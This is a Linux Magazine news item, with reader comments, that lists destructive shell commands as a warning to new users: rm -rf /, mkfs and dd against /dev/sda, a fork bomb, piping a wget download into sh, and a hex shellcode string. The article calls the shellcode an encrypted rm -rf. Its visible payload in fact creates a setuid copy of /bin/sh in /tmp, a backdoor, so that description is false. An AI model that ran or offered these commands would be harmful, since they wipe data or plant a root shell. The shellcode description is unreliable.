Seven Deadliest Linux Commands
In a TechSource Blog blog, Philippine technology student Jun Auza has assembled a list of the seven deadliest Linux commands, which his readers promptly augmented.
Auza warns new forum and chat participants not to fall into the trap of calling each other "dumbheads."
CAUTION! All commands included in the blog and that appear here actually destroy a complete Linux system. Those wishing to try them should do so on a separate, virtual machine. Please proceed at your own risk!
The first, classic deadly command is certainly:
rm -rf/
The command starts at root and will forcefully delete all files recursively. The result: the hard disk and all relevant files are wiped out.
A corollary to the first deadly command is its hex equivalent:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
According to Auza, this encrypted version of rm -rf/ can "deceive even the rather experienced Linux users."
A deletion that might proceed somewhat faster than a complete hard disk wipeout is:
mkfs.ext3 /dev/sda
The command will do horrible things to sda.
If losing data were bad enough, consider this command:
:(){:|:&};:
It executes enough processes to freeze your system and completely corrupt your data. It is also known as the "forkbomb." Should you use the command in a startup script, at least a system message will mitigate the effect.
Back to the hard disk, with this command:
any_command > /dev/sda
The any_command can be for a favorite program that might output some terminal data, but in this case it writes it to the sda hard disk. As a rule, all data will span partitions and the entire filesystem will cross the River Styx.
Even Linux has so-called rootkits, malware that takes control of root and transforms the PC into an unwilling zombie. All you need is some_untrusted_source on the Web and use wget on it:
wget http:// some_untrusted_source -O- | sh
The command certainly invites trouble from the untrusted URL in the way of possible rootkits with malicious code.
The last of the seven deadliest commands Auza calls the /dev/null trick:
mv /home/my_home_directory/* /dev/null
Everything you move to /dev/null, such as your favorite home directory, will end up in the Big Garbage Heap.
As the responses to the blog steadily grow, many additional ways to destroy your Linux system are beginning to emerge. A prominent one is:
dd if=/dev/urandom of=/dev/sda
This fills the sda disk with random numbers. Oh joy!
Users should be especially wary of requests involving root privileges, the rm -rf or dd commands, redirection (via "|" and ">"), or using a hard disk (such as /dev/sda) as a parameter.
Comments
comments powered by DisqusSubscribe to our Linux Newsletters
Find Linux and Open Source Jobs
Subscribe to our ADMIN Newsletters
Support Our Work
Linux Magazine content is made possible with support from readers like you. Please consider contributing when you’ve found an article to be beneficial.
News
-
Hacker Successfully Runs Linux on a CPU from the Early ‘70s
From the office of "Look what I can do," Dmitry Grinberg was able to get Linux running on a processor that was created in 1971.
-
OSI and LPI Form Strategic Alliance
With a goal of strengthening Linux and open source communities, this new alliance aims to nurture the growth of more highly skilled professionals.
-
Fedora 41 Beta Available with Some Interesting Additions
If you're a Fedora fan, you'll be excited to hear the beta version of the latest release is now available for testing and includes plenty of updates.
-
AlmaLinux Unveils New Hardware Certification Process
The AlmaLinux Hardware Certification Program run by the Certification Special Interest Group (SIG) aims to ensure seamless compatibility between AlmaLinux and a wide range of hardware configurations.
-
Wind River Introduces eLxr Pro Linux Solution
eLxr Pro offers an end-to-end Linux solution backed by expert commercial support.
-
Juno Tab 3 Launches with Ubuntu 24.04
Anyone looking for a full-blown Linux tablet need look no further. Juno has released the Tab 3.
-
New KDE Slimbook Plasma Available for Preorder
Powered by an AMD Ryzen CPU, the latest KDE Slimbook laptop is powerful enough for local AI tasks.
-
Rhino Linux Announces Latest "Quick Update"
If you prefer your Linux distribution to be of the rolling type, Rhino Linux delivers a beautiful and reliable experience.
-
Plasma Desktop Will Soon Ask for Donations
The next iteration of Plasma has reached the soft feature freeze for the 6.2 version and includes a feature that could be divisive.
-
Linux Market Share Hits New High
For the first time, the Linux market share has reached a new high for desktops, and the trend looks like it will continue.
jdong
Even more deadly
$ source ~/.bash_history
Well, how would you clean up THIS mess you just made?
data protection
Not really that dangerous....
Mind you, people would need to be signed in as root for these commands to do any significant damage (sudo or su will do), but as I keep saying to people, if they don't backup data they deserve to lose it.
Dad just lost 4 years of digital photos from a HDD crash--no funny commands there, and had prior to that his system plagued by virii before switching to GNU/Linux.
Other than that, great article!
stolen indeed
Not convinced? Let's look at a quick side-by-side:
Blog:
Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.
UF announcement:
Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
Blog:
With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.
UF annoucnement
Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data
If you think this wording choice is similar only by coincidence, then fine.
not stolen
Stolen from UbuntuForums announcement